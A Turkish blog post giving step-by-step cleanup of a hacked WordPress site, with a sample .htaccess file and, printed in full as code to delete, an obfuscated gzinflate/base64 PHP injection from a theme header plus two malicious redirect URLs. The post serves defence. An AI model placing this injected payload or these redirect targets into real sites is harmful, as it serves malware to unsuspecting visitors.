WordPress Malware Temizleme

Siteniz tarayıcılarda zararlı içerikli site olarak engellenmekteyse (Google safe browsing) veya aşağıda yer alan sitelere yönlendirilmekteyse veya virüs tarayıcı tarafından iframe içerikli virüs tespit edilmekteyse yapmanız gereken ciddi adımlar bulunmaktadır. Bunları uygulamadığınız takdirde sitenize giren kişiler malware tarzı virüslerden etkilenecek ve muhtemelen siteniz ulaşılabilir olmayacaktır. Sitenizin ana erişim tanımlarında zararlı yönlendirmeler bulunduğundan ve temanıza da yönlendirme kodları enjekte edildiğinden ciddi bir problemle karşı karşıya olduğunuzu söylemeliyim. Şu an binlerce wordpress temelli site hacklenmiş durumda ve  benzeri zararlı kodlarla başı belada.

Aşağıda anlatacaklarım gayet teknik konulardır. Bu konularda yardım almanız gerekebilir. Benimle iletişim kurarsanız elimden geldiğince sizlere yardımcı olmaya da çalışırım.

Ayrıca ücretli profesyonel hizmet almak istiyorsanız fiverr üzerinden bunu yapabilirsiniz.

Siteye erişim için tıklayınız…

1. Öncelikle sitenizde virüs bulunup bulunmadığını http://sitecheck.sucuri.net üzerinden kontrol ediniz. Burada “site infected with malware” gibi bir uyarıyla karşılaşıyorsanız sitenizin virüs barındırdığından emin olabilirsiniz.
2. Hemen cpanel veya whm panel şifrenizi değiştiriniz. Bu önemli bir adım.
3. Sitenize filezilla gibi bir ftp uygulamasıyla bağlanarak .htaccess dosyanızı düzenleyiniz. Burada yapmanız gereken tüm kodları silmek ve temiz bir örnek ile dosyanızı değiştirmektir.Temiz .htaccess örneğini aşağıda görebilirsiniz.
4. Ardından temanızın bulunduğu klasöre geçiniz ve büyük ihtimalle virüsün bozmuş olduğu header.php dosyasını düzenleyiniz. Burada yapmanız gereken wp_head(); ?> tagi üstünde yer alan garip gurup kodları silmektir. Örnek sildiğim kodları aşağıda görebilirsiniz.
5. Tekrar 1. maddedeki virüs tarayıcı uygulaması ile sitenizi taratınız ve “clean” mesajını aldığınızdan emin olunuz.
6. Geçmiş olsun.

Temiz .htaccess örneği

# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

# BEGIN WordPress

# END WordPress

header.php içinde silinmesi gereken örnek zararlı kodlar bloğu

#c3284d#
echo(gzinflate(base64_decode(“VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/”)));
#/c3284d#

Virüsün sağlamaya çalıştığı örnek Yönlendirmeler:

http://creativeironart.net/images/stats.php

http://cabaniaseleden.com.ar/stats.php